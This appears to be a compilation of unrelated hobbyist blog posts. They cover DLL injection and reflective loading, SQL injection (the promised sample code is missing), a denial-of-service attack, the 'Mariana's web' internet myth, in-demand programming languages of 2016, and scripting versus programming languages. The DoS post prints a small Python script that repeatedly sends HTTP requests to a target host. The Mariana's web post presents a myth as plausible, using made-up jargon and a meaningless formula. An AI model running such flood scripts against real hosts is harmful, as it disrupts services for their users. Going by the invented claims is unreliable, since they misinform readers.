DLL injection

In computer programming, DLL injection is a technique used for running code within the address space of another process by forcing it to load a dynamic-link library.^[1] DLL injection is often used by external programs to influence the behavior of another program in a way its authors did not anticipate or intend.^[1][2][3] For example, the injected code could hook system function calls,^[4][5] or read the contents of password textboxes, which cannot be done the usual way.^[6] A program used to inject arbitrary code into arbitrary processes is called a DLL injector.
    
     It's not really known when the first DLL injection was introduced. However, today there are many possible types and uses for DLL injections. One of the basic uses is reading contents of a password text box to gain access to a computer user's private information. Most, if not all, of the uses for DLL injections are malicious in nature and potentially illegal. To help combat the problem, Microsoft introduced the "protected process" in Windows Vista, which is nearly immune to these DLL injections.

     
Normally when you load a DLL in Windows, you call LoadLibrary. LoadLibrary takes the file path of a DLL and loads it in to memory. In addition to the DLL being on disk, the DLL will show up when tools such as ListDLLs are used to enumerate the DLLs loaded in memory.
Reflective DLL loading refers to loading a DLL from memory rather than from disk. Windows doesn’t have a LoadLibrary function that supports this, so to get the functionality you have to write your own. One benefit to writing our own function is that we omit some of the things Windows normally does, such as registering the DLL as a loaded module in the process, which makes the reflective loader sneakier when being investigated. Meterpreter is an example of a tool which uses reflective loading to hide itself.


       

SQL injection

SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

    A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

       SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces. Due to the nature of programmatic interfaces available, J2EE and ASP.NET applications are less likely to have easily exploited SQL injections. The severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to a lesser extent, defense in depth countermeasures, such as low privilege connections to the database server and so on. In general, consider SQL Injection a high impact severity.

A SQL injection code looks like this :

 

Please like my facebook page below and click on the follow button.

DOS attack

A denial-of-service attack (DoS attack) is a cyber-attackwhere the perpetrator seeks to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet . Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IPprotocols. For all known DoS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks. But, like viruses, new DoS attacks are constantly being dreamed up by hackers.

A sample of dos script is given below

import socket, sys, os  

print "][ Attacking " + sys.argv[1]  + " ... ]["  

print "injecting " + sys.argv[2];  

def attack():  

    #pid = os.fork()  

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  

    s.connect((sys.argv[1], 80))  

    print ">> GET /" + sys.argv[2] + " HTTP/1.1"  

    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")  

    s.send("Host: " + sys.argv[1]  + "\r\n\r\n");  

    s.close()  

for i in range(1, 1000):  

    attack()

Please like my Facebook page below

MARIANA'S WEB

 Many of you may have heard about mariana's web. It is the deepest  part of the internet said to have information about everything. It is named after the deepest ocean trench mariana's trench. You can only access this level using Polymeric Falcighol Derivation, which requires quantum computers to work. It is somewhat like  c = λ/2 (1-λ/2) this. 
     
      If we search around the internet we can get different view of people about mariana's web. Some say that it exist and some say it doesn't.There is of course Dark web or Deep web which can be accessed using Tor, a special type of software used for accessing deep web. I think that people confused the deepest part of dark web with mariana's web which may be run by some powerful and confidential organization.

     The mariana's web may be real as it is a confidential part of the internet and it is difficult to access so people  say it is fake. But god knows in the where in the deepest part of the internet there may be mariana's web.What do you think of mariana's web write about in the comments section below.

CHECK OUT THE MOST DEMANDING PROGRAMMING LANGUAGES

HERE ARE THE MOST DEMANDING PROGRAMMING LANGUAGES OF 2016

1.SQL
        SQL can be found far and wide in various flavors. Database technologies such as MySQL, PostgreSQL and Microsoft SQL Server power big businesses, small businesses, hospitals, banks, universities. Indeed, just about every computer and person with access to technology eventually touches something SQL. For instance, all Android phones and iPhones have access to a SQL database called SQLite and many mobile apps developed Google, Skype and DropBox use it directly. So, there is a huge demand of SQL.

2.JAVA
       It’s one of the most widely adopted programming languages, used by some 9 million developers and running on 7 billion devices worldwide. It’s also the programming language used to develop all native Android apps. Java’s popularity with developers is due to the fact that the language is grounded in readability and simplicity. Java has staying power since it has long-term compatibility, which makes sure older applications continue to work now into the future.

3.JAVASCRIPT
       As  I have already said in my previous post that Java and JavaScript are totally different languages. So, dont be confused.It is used to spice up web pages by making them interactive. For example, JavaScript can be used to add effects to web pages, display pop-up messages or to create games with basic functionality. It’s also worth noting that JavaScript is the scripting language of the World Wide Web and is built right into all major web browsers including Internet Explorer, FireFox and Safari. Almost every website incorporates some element of JavaScript to add to the user experience, adding to the demand for JavaScript developers.

4.C#
     Dating from 2000, C# (pronounced C-sharp) is a relatively new programming language designed by Microsoft for a wide range of enterprise applications that run on the .NET Framework. An evolution of C and  C++, the C# language is simple, modern, type safe and object oriented.

5.PYTHON
          Python is a general purpose programming language that was named after the Monty Python Python is simple and incredibly readable since closely resembles the English language. It’s a great language for beginners, all the way up to seasoned professionals.


6.C++
    C++ (pronounced C-plus-plus) is a general purpose object-oriented programming language based on the earlier ‘C’ language. Developed by Bjarne Stroustrup at Bell Labs, C++ was first released in 1983. Stroustrup keeps an extensive list of applications written in C++. The list includes Adobe and Microsoft applications, MongoDB databases, large portions of Mac OS/X and is the best language to learn for performance-critical applications such as “twitch” game development or audio/video processing.

7.PHP
        Created by Danish-Canadian programmer Rasmus Lerdorf in 1994, PHP was never actually intended to be a new programming language. Instead, it was created to be a set of tools to help Rasmus maintain his Personal Home Page (PHP). Today, PHP (Hypertext Pre-Processor) is a scripting language, running on the server, which can be used to create web pages written in HTML.

8. IOS/SWIFT
        In 2014, Apple decided to invent their own programming language. The result was Swift – a new programming language for iOS and OS X developers to create their next killer app. Developers will find that many parts of Swift are familiar from their experience of developing in C++ and Objective-C. Companies including American Airlines, LinkedIn, and Duolingo have been quick to adopt Swift, and we’ll see this language on the rise in the coming years.

9.RUBY ON RAILS
        Like Java or the C language, Ruby is a general purpose programming language, though it is best known for its use in web programming, and Rails serves as a framework for the Ruby Language. Ruby on Rails has many positive qualities including rapid development, you don’t need as much code, and there are a wide variety of 3^rd party libraries available. It’s used from companies ranging from small start-ups to large enterprises and everything in-between. Hulu, Twitter, Github and Living Social are using Ruby on Rails for at least one of their web applications.


    

Difference between scripting language and programming language

A programming language is a language used by humans to give instructions to a machine. 

A scripting language is a subset of programming language that is used to produce scripts, which are sets of instructions that automate tasks that would otherwise be performed manually by a human.

Sometimes the terms programming language and scripting language are used colloquially to describe compiled programming languages and interpreted programming languages, respectively. Compiled programming languages are languages whose instructions are translated (compiled) directly into machine code, whereas interpreted languages are those that require a program known as an interpreter, which interprets instructions in terms of previously compiled machine code.

   Some of the famous Scripting language:
1.JavaScript
2.PHP
3.Python
4.Ruby

     Some of the famous programming language:
1.Java
2.C
3.C++
4.C#


A example of Hello world program in JavaScript

01	<!DOCTYPE HTML>

02

<html>

03

<body>

04

05	<p>Header...</p>

06

07

<script>

08	alert('Hello, World!')

09

</script>

10

11	<p>...Footer</p>

12

13

</body>

14

</html>

A example of Hello world program in Java :

public class HelloWorld {

    public static void main(String[] args) {
        // Prints "Hello, World" to the terminal window.
        System.out.println("Hello, World");
    }

} 

Note : I gave the example of java and javascript because

       most of the people confuse javascript with java. 

       They are totally different language.

Like my facebook page https://www.facebook.com/compro54/